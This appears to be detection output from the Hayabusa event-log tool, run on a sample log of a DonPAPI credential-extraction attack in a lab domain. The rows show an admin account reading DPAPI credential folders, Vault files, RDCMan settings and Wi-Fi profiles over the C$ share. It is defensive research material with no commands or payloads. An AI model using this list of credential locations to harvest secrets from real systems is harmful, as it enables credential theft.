+2021-12-12 16:16:00.039 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.054 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\4543CF9BB17D44B2079AB6013FE18370 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:00.054 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.623 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Credentials\57D74E214C13D83D75A7EC9FC4F9BD50 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.623 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.638 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.638 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.638 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.654 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.670 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.686 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.701 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.717 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.733 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.748 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Wlansvc\Profiles\Interfaces | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.765 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.780 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
+2021-12-12 16:16:02.796 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
